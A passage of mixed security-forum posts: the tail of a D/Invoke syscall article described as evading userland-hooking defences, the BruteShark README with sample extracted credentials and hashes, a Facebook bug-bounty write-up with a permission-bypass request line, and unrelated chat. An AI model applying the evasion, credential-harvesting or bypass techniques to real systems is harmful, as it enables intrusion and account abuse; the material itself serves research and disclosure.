            PortClosed = 0xc0000700,
            MessageLost = 0xc0000701,
            InvalidMessage = 0xc0000702,
            RequestCanceled = 0xc0000703,
            RecursiveDispatch = 0xc0000704,
            LpcReceiveBufferExpected = 0xc0000705,
            LpcInvalidConnectionUsage = 0xc0000706,
            LpcRequestsNotAllowed = 0xc0000707,
            ResourceInUse = 0xc0000708,
            ProcessIsProtected = 0xc0000712,
            VolumeDirty = 0xc0000806,
            FileCheckedOut = 0xc0000901,
            CheckOutRequired = 0xc0000902,
            BadFileType = 0xc0000903,
            FileTooLarge = 0xc0000904,
            FormsAuthRequired = 0xc0000905,
            VirusInfected = 0xc0000906,
            VirusDeleted = 0xc0000907,
            TransactionalConflict = 0xc0190001,
            InvalidTransaction = 0xc0190002,
            TransactionNotActive = 0xc0190003,
            TmInitializationFailed = 0xc0190004,
            RmNotActive = 0xc0190005,
            RmMetadataCorrupt = 0xc0190006,
            TransactionNotJoined = 0xc0190007,
            DirectoryNotRm = 0xc0190008,
            CouldNotResizeLog = 0xc0190009,
            TransactionsUnsupportedRemote = 0xc019000a,
            LogResizeInvalidSize = 0xc019000b,
            RemoteFileVersionMismatch = 0xc019000c,
            CrmProtocolAlreadyExists = 0xc019000f,
            TransactionPropagationFailed = 0xc0190010,
            CrmProtocolNotFound = 0xc0190011,
            TransactionSuperiorExists = 0xc0190012,
            TransactionRequestNotValid = 0xc0190013,
            TransactionNotRequested = 0xc0190014,
            TransactionAlreadyAborted = 0xc0190015,
            TransactionAlreadyCommitted = 0xc0190016,
            TransactionInvalidMarshallBuffer = 0xc0190017,
            CurrentTransactionNotValid = 0xc0190018,
            LogGrowthFailed = 0xc0190019,
            ObjectNoLongerExists = 0xc0190021,
            StreamMiniversionNotFound = 0xc0190022,
            StreamMiniversionNotValid = 0xc0190023,
            MiniversionInaccessibleFromSpecifiedTransaction = 0xc0190024,
            CantOpenMiniversionWithModifyIntent = 0xc0190025,
            CantCreateMoreStreamMiniversions = 0xc0190026,
            HandleNoLongerValid = 0xc0190028,
            NoTxfMetadata = 0xc0190029,
            LogCorruptionDetected = 0xc0190030,
            CantRecoverWithHandleOpen = 0xc0190031,
            RmDisconnected = 0xc0190032,
            EnlistmentNotSuperior = 0xc0190033,
            RecoveryNotNeeded = 0xc0190034,
            RmAlreadyStarted = 0xc0190035,
            FileIdentityNotPersistent = 0xc0190036,
            CantBreakTransactionalDependency = 0xc0190037,
            CantCrossRmBoundary = 0xc0190038,
            TxfDirNotEmpty = 0xc0190039,
            IndoubtTransactionsExist = 0xc019003a,
            TmVolatile = 0xc019003b,
            RollbackTimerExpired = 0xc019003c,
            TxfAttributeCorrupt = 0xc019003d,
            EfsNotAllowedInTransaction = 0xc019003e,
            TransactionalOpenNotAllowed = 0xc019003f,
            TransactedMappingUnsupportedRemote = 0xc0190040,
            TxfMetadataAlreadyPresent = 0xc0190041,
            TransactionScopeCallbacksNotSet = 0xc0190042,
            TransactionRequiredPromotion = 0xc0190043,
            CannotExecuteFileInTransaction = 0xc0190044,
            TransactionsNotFrozen = 0xc0190045,
            MaximumNtStatus = 0xffffffff
        }
    }
}

This is definitely not as straightforward as using P/Invoke, but it's a very effective means of evading defensive products that employ userland hooking. API Monitor does not detect the use of these APIs - but feel free to verify that for yourself!

Source: https://offensivedefence.co.uk/posts/dinvoke-syscalls/
-
BruteShark

About

BruteShark is a Network Forensic Analysis Tool (NFAT) that performs deep processing and inspection of network traffic (mainly PCAP files). It includes: password extracting, building a network map, reconstructing TCP sessions, extracting hashes of encrypted passwords and even converting them to a Hashcat format in order to perform an offline Brute Force attack.

The main goal of the project is to provide a solution to security researchers and network administrators with the task of network traffic analysis while they try to identify weaknesses that can be used by a potential attacker to gain access to critical points on the network.

Two BruteShark versions are available, a GUI based application (Windows) and a Command Line Interface tool (Windows and Linux). The various projects in the solution can also be used independently as infrastructure for analyzing network traffic on Linux or Windows machines. For further details see the Architecture section.

The project was developed in my spare time to address two main passions of mine: software architecture and analyzing network data. I love to get feedback from BruteShark users, your opinion is important to me! Feel free to contact me on contact.oded.shimon@gmail.com or create a new issue.

Please ⭐️ this repository if this project helped you! Also, if you're feeling generous, you can buy me a coffee.

What it can do

- Extracting and encoding usernames and passwords (HTTP, FTP, Telnet, IMAP, SMTP...)
- Extract authentication hashes and crack them using Hashcat (Kerberos, NTLM, CRAM-MD5, HTTP-Digest...)
- Build visual network diagram (Network nodes & users)
- Extract DNS queries
- Reconstruct all TCP & UDP Sessions
- File Carving

Download

Windows

Prerequisites:
- WinPcap / Npcap driver (Wireshark installs one of these by default)
- .NET Core SDK

Download Windows Installer (64 Bit).
Linux

Prerequisites:
- libpcap driver

Download BruteSharkCli and just run it:

# Create a symbolic link between libpcap.so and the actual libpcap file (e.g. libpcap.so.0.8)
# That is needed due to a known issue in SharpPcap (https://github.com/chmorgan/sharppcap/issues/167)
find /usr/lib/x86_64-linux-gnu -type f | grep libpcap | head -1 | xargs -i sudo ln -s {} /usr/lib/x86_64-linux-gnu/libpcap.so
wget https://github.com/odedshimon/BruteShark/releases/latest/download/BruteSharkCli
chmod +x BruteSharkCli
./BruteSharkCli

Examples

Videos:
- How do I crack (by mistake!) Windows 10 user NTLM password
- Run Brute Shark CLI on Ubuntu with Mono

Screenshots:
- Hashes Extracting
- Building a Network Diagram
- File Carving
- Password Extracting
- Reconstruct all TCP Sessions
- Brute Shark CLI

Usage

In general, it is recommended to use the example PCAP files folder, load, run and explore the results.

Modules

BruteShark is a modular tool, designed for expansion.

Credentials Module

This module is responsible for extracting and encoding usernames and passwords as well as authentication hashes. In fact this module is responsible for updating two display tables, the passwords table and the hashes table. While usernames and passwords are straightforward to use, hashes are most often used in more complex attacks like pass-the-hash, or are brute-forced to recover the password. BruteShark is integrated with Hashcat so all the hashes extracted can be converted to a Hashcat input file.

Protocol          Hash Type           Hashcat Mode (-m)
HTTP              HTTP-Digest         11400
SMTP\IMAP         CRAM-MD5            16400
NTLM (e.g. SMB)   NTLMv1              5500
NTLM (e.g. SM B)  NTLMv2              5600
Kerberos          AS-REQ etype 23     7500
Kerberos          TGS-REP etype 23    13100
Kerberos          AS-REP etype 23     18200

Network Map Module

This module is responsible for building the network map by identifying components in the network and the connections between them. The network map can be exported to JSON format for analysis with external tools such as Neo4j.
Files Extracting Module

This module tries to extract files from UDP / TCP sessions (therefore, note that in order for this module to be effective, "Build TCP Sessions" / "Build UDP Sessions" should be turned on). Currently this module supports the classic forensics technique of file carving by the "Header-Footer" algorithm, which is effective for files with a known file header and footer like JPG, PNG, PDF.

BruteSharkDesktop

The GUI is pretty self-explanatory, just load the wanted files, configure the wanted modules and press the run button.

BruteSharkCli

BruteSharkCli has two modes: single command and shell mode. The single command mode works by getting all the relevant parameters for the processing and then printing the results to stdout or files. The shell mode allows you to perform each step individually.

Single Command Mode

Print the help menu:

C:\Users\King\Desktop\BruteSharkCli>BruteSharkCli.exe --help
BruteSharkCli 1.0.0.0
Copyright c 2018

  -d, --input-dir    The input directory containing the files to be processed.
  -i, --input        The files to be processed seperated by comma
  -m, --modules      The modules to be separterd by comma: Credentials, FileExtracting, NetworkMap
  -o, --output       Output direcorty for the results files.
  --help             Display this help screen.
  --version          Display version information.
Get credentials from all files in a directory (passwords and hashes will be printed to stdout):

C:\Users\King\Desktop\BruteSharkCli>BruteSharkCli.exe -m Credentials -d "C:\Users\King\Desktop\Pcap Files"
[+] Started analyzing 5 files
File : Ftp.pcap Processing Started
Found: Network Credential: 192.168.0.114=>192.168.0.193(FTP) => csanders:echo
File : Ftp.pcap Processing Finished
File : HTTP - Basic Authentication.pcap Processing Started
Found: Network Credential: 192.168.0.4=>192.254.189.169(HTTP Basic Authentication) => test:fail
Found: Network Credential: 192.168.0.4=>192.254.189.169(HTTP Basic Authentication) => test:fail2
Found: Network Credential: 192.168.0.4=>192.254.189.169(HTTP Basic Authentication) => test:fail3
Found: Network Credential: 192.168.0.4=>192.254.189.169(HTTP Basic Authentication) => test:test
File : HTTP - Basic Authentication.pcap Processing Finished
File : IMAP - Authenticate CRAM-MD5.cap Processing Started
Found: Hash: 10.0.2.101=>10.0.1.102:10.0.1.102(IMAP) CRAM-MD5 => aGVtbWluZ3dheSAyOWYyMGI2NjkzNDdhYTA4MTc0OTA2NWQ5MDNhNDllNA==
File : IMAP - Authenticate CRAM-MD5.cap Processing Finished
File : SMB - NTLMSSP (smb3 aes 128 ccm).pcap Processing Started
Found: Hash: 10.160.64.139=>10.160.65.202:10.160.65.202(NTLMSSP) NTLMv2 => 39dbdbeb1bdd29b07a5d20c8f82f2cb701010000000000008a8ce7a9f4ced201e7969a04872c16890000000002000800530055005300450001000c0057005300320030003100360004000e0073007500730065002e006400650003001c005700530032003000310036002e0073007500730065002e006400650005000e0073007500730065002e0064006500070008008a8ce7a9f4ced20100000000
File : SMB - NTLMSSP (smb3 aes 128 ccm).pcap Processing Finished
File : SMTP - Auth Login.pcap Processing Started
Found: Network Credential: 10.10.1.4=>74.53.140.153(SMTP (Auth Login)) => gurpartap@patriots.in:punjab@123
File : SMTP - Auth Login.pcap Processing Finished
[X] Bruteshark finished processing

Get credentials from all files in a directory and also export extracted hashes (if found) to Hashcat input files:

BruteSharkCli.exe -m Credentials -d C:\Users\King\Desktop\Pcap_Examples -o C:\Users\King\Desktop\Results

Run multiple modules on all files in a directory and also export all the results:

BruteSharkCli.exe -m Credentials,NetworkMap,FileExtracting -d C:\Users\King\Desktop\Pcap_Examples -o C:\Users\King\Desktop\Results

Shell Mode

Just type BruteSharkCli.exe and then navigate using the following commands.

Keyword             Description
help                Print help menu
exit                Exit CLI
add-file            Add file to analyze. Usage: add-file FILE-PATH
start               Start analyzing
show-passwords      Print passwords.
show-modules        Print modules.
show-hashes         Print Hashes
show-networkmap     Prints the network map as a json string. Usage: show-networkmap
export-hashes       Export all Hashes to Hashcat format input files. Usage: export-hashes OUTPUT-DIRECTORY
export-networkmap   Export network map to a json file for neo4j. Usage: export-networkmap OUTPUT-FILE

Architecture

All BruteShark projects are implemented using .Net Core and .Net Standard for modern and cross platform support. The solution is designed with a three layer architecture, including one or more projects at each layer - DAL, BLL and PL. The separation between layers is created by the fact that each project refers only to its own objects.

PcapProcessor (DAL)

As the Data Access Layer, this project is responsible for reading raw PCAP files using appropriate drivers (WinPcap, libpcap) and the amazing wrapper library SharpPcap by Chris Morgan. It can analyze a list of files at once, and provides additional features like reconstruction of all TCP Sessions (using the awesome project TcpRecon).

PcapAnalyzer (BLL)

The Business Logic Layer, responsible for analyzing network information (packet, TCP Session etc.), implements a pluggable mechanism. Each plugin is basically a class that implements the interface IModule.

All plugins are loaded using reflection:

private void _initilyzeModulesList()
{
    // Create an instance for any available modules by looking for every concrete class
    // that implements IModule (interfaces and abstract bases cannot be instantiated).
    this._modules = AppDomain.CurrentDomain.GetAssemblies()
        .SelectMany(s => s.GetTypes())
        .Where(p => typeof(IModule).IsAssignableFrom(p) && !p.IsInterface && !p.IsAbstract)
        .Select(t => (IModule)Activator.CreateInstance(t))
        .ToList();

    // Register to each module event.
    foreach (var m in _modules)
    {
        m.ParsedItemDetected += (s, e) => this.ParsedItemDetected(s, e);
    }
}

BruteSharkDesktop (PL)

Desktop application for Windows based on WinForms. It is a cross-cutting project in the sense that it references both the DAL and BLL layers. This is done by composing each of the layers and registering to their events; when an event is triggered, the event object is cast to the next layer's equivalent object and sent on to the next layer.

public MainForm()
{
    InitializeComponent();
    _files = new HashSet<string>();

    // Create the DAL and BLL objects.
    _processor = new PcapProcessor.Processor();
    _analyzer = new PcapAnalyzer.Analyzer();
    _processor.BuildTcpSessions = true;

    // Create the user controls.
    _networkMapUserControl = new NetworkMapUserControl();
    _networkMapUserControl.Dock = DockStyle.Fill;
    _sessionsExplorerUserControl = new SessionsExplorerUserControl();
    _sessionsExplorerUserControl.Dock = DockStyle.Fill;
    _hashesUserControl = new HashesUserControl();
    _hashesUserControl.Dock = DockStyle.Fill;
    _passwordsUserControl = new GenericTableUserControl();
    _passwordsUserControl.Dock = DockStyle.Fill;

    // Contract the events.
_processor.TcpPacketArived += (s, e) => _analyzer.Analyze(Casting.CastProcessorTcpPacketToAnalyzerTcpPacket(e.Packet)); _processor.TcpSessionArived += (s, e) => _analyzer.Analyze(Casting.CastProcessorTcpSessionToAnalyzerTcpSession(e.TcpSession)); _processor.FileProcessingStarted += (s, e) => SwitchToMainThreadContext(() => OnFileProcessStart(s, e)); _processor.FileProcessingEnded += (s, e) => SwitchToMainThreadContext(() => OnFileProcessEnd(s, e)); _processor.ProcessingPrecentsChanged += (s, e) => SwitchToMainThreadContext(() => OnProcessingPrecentsChanged(s, e)); _analyzer.ParsedItemDetected += (s, e) => SwitchToMainThreadContext(() => OnParsedItemDetected(s, e)); _processor.TcpSessionArived += (s, e) => SwitchToMainThreadContext(() => OnSessionArived(Casting.CastProcessorTcpSessionToBruteSharkDesktopTcpSession(e.TcpSession))); _processor.ProcessingFinished += (s, e) => SwitchToMainThreadContext(() => OnProcessingFinished(s, e)); InitilizeFilesIconsList(); this.modulesTreeView.ExpandAll(); } Contributing First off, thanks for taking the time to contribute! BruteShark welcomes contributions from everyone. When contributing to this repository, please first discuss the change you wish to make via issue or an email before making a change. How Can You Contribute? Implemening new features from BruteShark Issues, look for "good first isuue" and "help wanted" labels. Uploading example PCAP files, especially files, with interesting content. Proposing new features by Creating an Issue. Reporting a bug by Creating an Issue. Discussing the current state of the code. Creating videos and example tutorials of using BruteShark. Sursa: https://github.com/odedshimon/BruteShark
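The plugin mechanism and the event chaining described above can be shown end to end in a few dozen lines. The block below is an added illustration, not BruteShark's own code: TcpSession, IModule, HttpBasicAuthModule and Analyzer are hypothetical stand-ins for the project's types, and it assumes .NET 6 or later. Beyond what the README shows, it filters out abstract classes (which IsAssignableFrom also matches and Activator.CreateInstance cannot instantiate) and survives a ReflectionTypeLoadException from an assembly whose dependencies are missing. The sample session is constructed; its addresses and the test:test credential are the ones in the README output above.

```csharp
// Added illustration, not BruteShark's own code. All type names are hypothetical.
using System;
using System.Collections.Generic;
using System.Linq;
using System.Reflection;
using System.Text;

// Stand-in for a reassembled TCP session handed from the DAL to the BLL.
public sealed class TcpSession
{
    public string SourceIp { get; init; } = "";
    public string DestinationIp { get; init; } = "";
    public string Data { get; init; } = "";
}

// Stand-in for the IModule plugin contract.
public interface IModule
{
    string Name { get; }
    event EventHandler<string>? ParsedItemDetected;
    void Analyze(TcpSession session);
}

// Example plugin: HTTP Basic Authentication carries "user:password" base64-encoded,
// which is reversible, so seeing the header on the wire means the credential is exposed.
public sealed class HttpBasicAuthModule : IModule
{
    private const string Prefix = "Authorization: Basic ";
    public string Name => "HTTP Basic Authentication";
    public event EventHandler<string>? ParsedItemDetected;

    public void Analyze(TcpSession session)
    {
        foreach (var line in session.Data.Split("\r\n"))
        {
            if (!line.StartsWith(Prefix, StringComparison.OrdinalIgnoreCase)) continue;
            string decoded;
            try { decoded = Encoding.ASCII.GetString(Convert.FromBase64String(line[Prefix.Length..].Trim())); }
            catch (FormatException) { continue; }   // malformed header: not a credential
            ParsedItemDetected?.Invoke(this,
                $"Network Credential: {session.SourceIp}=>{session.DestinationIp}({Name}) => {decoded}");
        }
    }
}

// An abstract base also "is assignable to" IModule; a loader that filters only on
// IsInterface would pass it to Activator.CreateInstance, which throws.
public abstract class ModuleBase : IModule
{
    public abstract string Name { get; }
    public abstract event EventHandler<string>? ParsedItemDetected;
    public abstract void Analyze(TcpSession session);
}

// Stand-in for the Analyzer: discovers plugins by reflection and forwards their events.
public sealed class Analyzer
{
    private readonly List<IModule> _modules;
    public event EventHandler<string>? ParsedItemDetected;

    public Analyzer()
    {
        _modules = AppDomain.CurrentDomain.GetAssemblies()
            .SelectMany(LoadableTypes)
            .Where(t => typeof(IModule).IsAssignableFrom(t) && !t.IsInterface && !t.IsAbstract)
            .Select(t => (IModule)Activator.CreateInstance(t)!)
            .ToList();
        // Chain each plugin's event to the analyzer's own, as the README's loop does.
        foreach (var m in _modules)
            m.ParsedItemDetected += (s, e) => ParsedItemDetected?.Invoke(s, e);
    }

    // Assembly.GetTypes throws when one type's dependencies cannot be resolved;
    // keep the types that did load rather than abandoning the whole scan.
    private static IEnumerable<Type> LoadableTypes(Assembly asm)
    {
        try { return asm.GetTypes(); }
        catch (ReflectionTypeLoadException ex) { return ex.Types.Where(t => t != null).Select(t => t!); }
    }

    public void Analyze(TcpSession session)
    {
        foreach (var m in _modules) m.Analyze(session);
    }
}

public static class Demo
{
    public static void Main()
    {
        var analyzer = new Analyzer();
        analyzer.ParsedItemDetected += (_, item) => Console.WriteLine("Found: " + item);

        // Constructed sample session (not a real capture).
        var session = new TcpSession
        {
            SourceIp = "192.168.0.4",
            DestinationIp = "192.254.189.169",
            Data = "GET /private/ HTTP/1.1\r\nHost: example.test\r\nAuthorization: Basic "
                 + Convert.ToBase64String(Encoding.ASCII.GetBytes("test:test")) + "\r\n\r\n"
        };
        analyzer.Analyze(session);
    }
}
```

Running it prints a single "Found: Network Credential: 192.168.0.4=>192.254.189.169(HTTP Basic Authentication) => test:test" line, the same shape as the CLI output above; adding another IModule class to the assembly is enough for the loader to pick it up without touching Analyzer.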
-
I don't know if there's any "easy" solution for something like this. The developers probably have an ad contract with who knows what company and may not even know this can happen; they probably display ads at random. Or maybe they do know this can happen, but that's where the money comes from. To actually do something about it you need a jailbroken phone; in theory you can modify the app, but then I don't know whether you can still run it on a phone without a jailbreak. I don't recommend this jailbreak for day-to-day use by people who don't know exactly what it's about. Do an analysis on the Android version, it's simpler and you don't even need a phone. Take the app's link and use one of those online "APK downloader" sites. You get the APK and extract it with WinRAR/WinZip or something else. You'll have a classes.dex (maybe also classes2.dex) and you use "dex2jar" to extract the JAR. And the JAR you can load into "jd-gui" and see the source code. It's quite simple on Linux, you can download them directly; I don't know if they're in Kali by default, I don't think so.
-
Hi, learn the language itself well; I'd say that will help you learn any other language afterwards. My suggestion is to read a book and write code. I don't know if C++ is very useful or widely used at such companies; at some it is! Then, also learn algorithms. At companies like Google and others the emphasis is on algorithms and code optimization. Note that there are also many articles/tutorials along the lines of "interview at Google"; you'll get an idea about it from those.
-
The easiest solution would be to uninstall it and install it again, latest version. Restart(s) might be needed but it should work.
-
Bugtraq has been a valuable institution within the Cyber Security community for almost 30 years. Many of our own people entered the industry by subscribing to it and learning from it. So, based on the feedback we’ve received both from the community-at-large and internally, we’ve decided to keep the Bugtraq list running. We’ll be working in the coming weeks to ensure that it can remain a valuable asset to the community for years to come. - Accenture Security
-
Polio was eradicated through mass vaccination. The same did not happen for the flu. I don't think it ever will; the symptoms aren't as visible as with other viruses (e.g. chickenpox, measles...) and the death rate isn't that high either (at least among the young). That's why people don't worry and don't get vaccinated (in our country).
-
I don't think it's known, but I think the tendency is for it to be somewhat worse; it probably depends on the reinfection interval. More precisely, suppose the first infection affects 5% of the lungs. It's possible that this damage isn't resolved by the next infection, and if the next infection also affects 5% you'll have a combined 10%. In theory, I'm thinking. The duration of immunity depends on each person, both on the immune system and its state during each infection, and on the "intensity" of the infection, meaning how much virus enters the body at infection.
-
Hi, I don't think you need any cracked program; make a Live CD with Kali Linux and you have everything you need there. There are plenty of tutorials, even in this forum section; there are plenty of free tools and some even have a graphical interface.
-
I opened that link too; I think those girls want to get to know me as well, I hope you're not jealous. The good news is they don't have a penis. The bad news is it's cheap spam. You ignore it and move on.
-
2020 was quite the year, one that saw many changes. As we begin 2021, we wanted to send one last note to our friends and supporters at the SecurityFocus BugTraq mailing list.

As many of you know, assets of Symantec were acquired by Broadcom in late 2019, and some of those assets were then acquired by Accenture in 2020 (https://newsroom.accenture.com/news/accenture-completes-acquisition-of-broadcoms-symantec-cyber-security-services-business.htm). SecurityFocus assets were included in this transition, and the mailing list has not been updated since the work to transition to Accenture began.

The SecurityFocus assets, including the BugTraq mailing list, has a long history of providing timely information on the latest vulnerabilities, security vendor announcements, and exploit information. We are forever grateful to those who created, maintained, and contributed to the archive - many of us have connected and learned from each other through these lists. The history of the list and the sharing of the information has contributed to ensuring that we are building the information security community to be something stronger. Community contribution is one of the foundations to building a stronger Information Security force.

At this time, resources for the BugTraq mailing list have not been prioritized, and this will be the last message to the list. The archive will be shut down January 31st, 2021. For similar information, please refer to some of the following links:

https://www.defcon.org/html/links/mailing-lists.html
https://seclists.org/fulldisclosure/

This is where the appropriate geek-like reference and farewell comes in, something like “So long, and thanks for all the fish”, but that seems too cavalier for this. So thank you, for your support, wisdom, and willingness to share – whether you are a contributor, reader, or lurker on the list. All of you have made a difference. Be well, and keep up the good work!
-
Do you mean antivirals? See this: https://medicamente.romedic.ro/info/medicamentele-antivirale Think about Windows: why get infected with ransomware and try to get rid of it with who knows what "cleaner" (which can't do much) when you can have an up-to-date antivirus that prevents it? @gigiRoman - I don't know where you got that information; nobody said that antibodies acquired through infection last 3 months. The idea behind the vaccine and those 2 doses is exactly this: it stimulates the acquisition of antibodies in the best possible way, as tested by them. That's why the first dose is smaller and the second larger, precisely so that the antibodies last longer, so the memory T cells (I think) do their job. Edit: Klaus got vaccinated: https://www.digi24.ro/stiri/actualitate/klaus-iohannis-se-vaccineaza-anti-covid-la-ora-10-00-1434453 , so the problem is half solved. I'll do it too when my turn comes. By the way, Klaus sent me a private message, says the chip is asking him for a license; he was asking me for a filelist account so he can download one, or a crack. Does anyone have a filelist account to spare?
-
Useful: https://www.nytimes.com/interactive/2020/health/oxford-astrazeneca-covid-19-vaccine.html They forgot to explain how the chip works, but otherwise it seems nicely explained.
-
Wrong. That's how they invented hentai.
-
If I can, when I get vaccinated, I'll have someone film me. But rest assured I'm no fool: I'm going with the aluminium foil and I'll put it on my head afterwards, I won't let Bill control me! As for the first news item, of course it's possible to get infected after the first dose. It's possible after the second too, but the chances are very small, namely those 5%. Mum understood this; she probably has a higher IQ than you and doesn't really "do her research" on the subject. PS: Yes, of course they're being monitored; the aim is to find out how long the antibodies last. It differs from person to person anyway, but this way it's known roughly how much it helps. Meanwhile, you have above all the necessary documentation regarding the vaccine. That's where the official data is, everything you need to know about it. Read it and tell us if there's anything wrong there.
-
I don't know if the information was meant to be public, at least not by the European Medicines Agency. Those files seem to contain a great many details about the vaccine, perhaps even everything, which means others could reproduce it too. The source code. For us ordinary people it's good. We could understand it completely, if we had the necessary knowledge. And perhaps experienced doctors, microbiologists or other people can deduce certain things from it, such as the effects on people with allergies.
-
Yes, interesting, but I don't know how much it helps. Others probably did this long ago, without positive intentions and without announcing the IP used. But it seems to me that things are evolving here too. The test isn't intrusive anyway; they wouldn't even need to announce it, but probably did so as not to panic anyone. As if anyone monitors logs and access to that file... As proof, I ran a grep on my crummy site, www.xssfuzzer.com:

root@xssfuzzer:/var/log/apache2# grep -R Orion .
./access.log.1:162.243.128.120 - - [14/Dec/2020:04:29:57 +0000] "GET /Orion/Login.aspx HTTP/1.1" 404 3537 "-" "Mozilla/5.0 zgrab/0.x"
./access.log.1:145.220.25.28 - - [28/Dec/2020:02:44:00 +0000] "GET /Orion/WebResource.axd HTTP/1.1" 404 3537 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.95 Safari/537.36"

Cute.
-
Great, thanks a lot! I had a quick look; I see some uninteresting emails and some reports, nothing confidential seems to be there. I saw the structure and some details about the vaccine in a docx! Well, I don't understand much of it, but it's there. If anyone asks you what that vaccine contains you can hit them over the head with that document.
-
I saw these news stories too, but I didn't understand what those documents would contain. Does anyone have that leak?
-
It's fake, I know, but if you disregard that, it's actually touching... https://9gag.com/gag/aeDrrqQ
-
Why everyone should be using Signal instead of WhatsApp
Nytro replied to Nytro's topic in Stiri securitate
Relevant -
Why everyone should be using Signal instead of WhatsApp

The Signal protocol underpins WhatsApp's encryption, but Facebook's ubiquitous messaging service doesn't hold a candle to Signal itself

By K.G. Orphanides, Thursday 16 April 2020, WIRED

WhatsApp is the most popular communications app on the planet with over two billion users using it for messaging. Bought by Facebook in 2014, the service popularised the use of end-to-end encryption in day-to-day communications, introducing it as its default for messaging in 2016. To do so it cooperated with Moxie Marlinspike’s Open Whisper Systems to integrate the Signal encrypted messaging protocol. Microsoft and Google have also used the protocol, widely regarded as the gold standard in encrypted communications.

Now Open Whisper Systems exists as Signal Messenger, LLC, and is part of the Signal Foundation. This rebranding has seen the foundation put more effort into its own app. The Signal Foundation's flagship Signal app provides fully-fledged and easy to use secure communications in its own right. It has direct and group messaging, as well as one-to-one audio and video chat, and there are very good reasons to opt for secure messaging's Cool Original flavour over WhatsApp. In February, the European Commission advised its staff to do exactly that.

Here’s why you should use Signal for any conversation where privacy matters – even if that’s just giving your family the shared Disney+ password – and why your friends should, too.

1. Signal has more up-to-date security features

New security features come to Signal first. For example, Signal has had disappearing messages – which are automatically deleted after a specified period of time – since 2016 but the feature is still being tested with small numbers of WhatsApp users. Other mainstream and beta Signal features that WhatsApp users don’t have include view-once media messages, encrypted profiles, an incognito keyboard switch for Android to keep Gboard from sending your typing history back to Google, and backups that don’t default to unencrypted storage in Google Drive or Apple iCloud.

Signal also has a slightly broader range of clients, with a dedicated client for Linux desktop users – likely to appeal to those in the security and data analysis fields, while WhatsApp directs them to its web app.

2. Signal is open source

All of Signal’s source code is published for anyone to examine and use under a GPLv3 license for clients and an AGPLv3 license for the server. This means that you can see what’s going on inside it – or, more usefully, rely on the specialist expertise of people who review the code and know exactly what they’re looking for.

3. Signal has less potential for hidden vulnerabilities

As a larger platform, WhatsApp is more inviting to malicious actors to start with, but the fact that its codebase is a proprietary closed box means that it may take longer for dangerous vulnerabilities to be detected. Any application can and eventually will suffer vulnerabilities – Signal has resolved a few of its own. But WhatsApp’s closed-source code (beyond its use of the open Signal protocol) means that there are a lot of potential targets that remain unknown until they’re exploited. A particularly worrying example was a vulnerability in WhatsApp’s VoIP stack, used by intelligence agencies to inject spyware in 2019.

4. You can run your own Signal server (but probably shouldn’t)

Another advantage of open source software is that you can play with it, if you’re that way inclined. You probably won’t want or need a Signal server of your own for either personal or business reasons. It’s designed as a mass communications platform and isn’t really intended to scale down, it’s a pain to build and there are currently no containerised versions for easy deployment. But if you’re technically minded, you can learn a lot about how a system functions by building a test instance and poking it with a stick. It’s non-trivial, but community guides are available to help users get a Signal server up and running and some interesting forks exist, including a decentralised messaging system.

5. How much can you trust Facebook?

Perhaps the most compelling reason to use Signal is Facebook's long-standing lack of respect for its users' privacy. Facebook has an appalling history when it comes to data collection and handling, from the Cambridge Analytica affair to its practice of sharing data about users with phone manufacturers. It’s already proved that it can’t be trusted with WhatsApp user data that should, under EU law, have remained private.

In 2017, European regulators took action against Facebook for sharing the WhatsApp users’ phone numbers with its Facebook social network for advertising purposes. Firmly in breach of data protection regulations, it was an opt-out rather than opt-in system. Facebook had previously claimed such a mechanism would never be implemented.

WhatsApp co-developer Brian Acton, who left Facebook in 2017 and went on to co-found the Signal Foundation with Marlinspike, has harshly criticised Facebook’s approach to privacy and revealed that Facebook coached him “to explain that it would be really difficult to merge or blend data between [WhatsApp and Facebook]” when giving information to EU regulators in 2014. Facebook’s desire to insert adverts and commercial messaging into WhatsApp and potentially compromise its security prompted Acton to leave Facebook early, sacrificing some $850 million in stock in the process. Acton’s fellow WhatsApp dev, Jan Koum, also walked out on Facebook following reported disputes with the company over its efforts to weaken encryption.

Mark Zuckerberg has since publicly supported end-to-end encryption, saying it will also be added to its Messenger app. Facebook was until recently still vacillating over plans to introduce adverts to WhatsApp, with the latest reports indicating that the plan has finally been scrapped. Although it's not clear what will eventually happen to the service when Facebook merges WhatsApp with Instagram messaging and Messenger.

Sursa: https://www.wired.co.uk/article/signal-vs-whatsapp
-
Create post on any Facebook page
Pouya, 12:17 PM, No comments

Create an invisible post on any Facebook page

You may know that you can create many types of posts on your Facebook feed. One of them is called "invisible", which unlike other types cannot be seen on your feed, but like the others it has a link and an id. These types of posts are not shown on the feed timeline but are accessible via a direct link. The main impact of these types of posts is that the page admins cannot view or delete them since they don't have any links.

At Creative Hub we can create ads and use collaboration to complete them. Facebook creates an invisible post on the selected page for previewing them to the users. I intercepted the request and changed the "page_id" to the victim's "page_id" and it saved without any error or issue. The permission here has been checked before generating the preview, so you should definitely have the advertiser role. (above image)

Also, the Share feature (image below) has been added to Facebook's Creative Hub recently, therefore I started digging deeper into it again. After clicking on the share button the API will answer with a new shareable URL like this:

https://www.facebook.com/ads/previewer/__PREVIEW_KEY__

The gotcha is that the permission check is missing before generating a preview post on the share page. Changing page_id before saving the mockup in the GraphQL request and then getting back the shareable link for it gives us the ability to create a post on any page. All we need to do is to find the post_id that exists on any ad preview endpoint. Finally, we created an invisible post on the victim page without their knowledge!

POC:

Facebook fixed this vulnerability after I reported it but still, I was able to bypass the fix by using another approach.

// This request will create a post page plus sending a notification to the mobile device
AsyncRequest.post('/ads/previewer/notify_mobile/__PREVIEW_KEY__', {})

The "send to mobile" feature creates a preview again without checking permission.

Bypass POC:

Timeline:
November 6, 2020 – Report Sent
November 6, 2020 – Triaged
November 11, 2020 – Fixed
November 12, 2020 – Bypass Sent
November 12, 2020 – Triaged
November 20, 2020 – Fixed
December 16, 2020 – $30,000 Bounty awarded

Sursa: https://www.darabi.me/2020/12/create-invisible-post-on-any-facebook.html
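The pattern in the write-up above is a missing authorization check on a second (and then a third) entry point that produces the same side effect as the first. The block below is an added illustration of the defensive design that closes that class of bug, not Facebook's code: AdPreviewService, RequireAdvertiserRole and the in-memory role table are hypothetical, and the ids are constructed. The point it shows is that the page a preview belongs to is resolved from server-side state rather than from a client-supplied page_id, and that create, share and send-to-mobile all go through one gate, so a new entry point cannot forget the check.

```csharp
// Added illustration, not Facebook's code. All names and ids are hypothetical.
using System;
using System.Collections.Generic;

public sealed class Preview
{
    public string Key { get; }
    public long PageId { get; }
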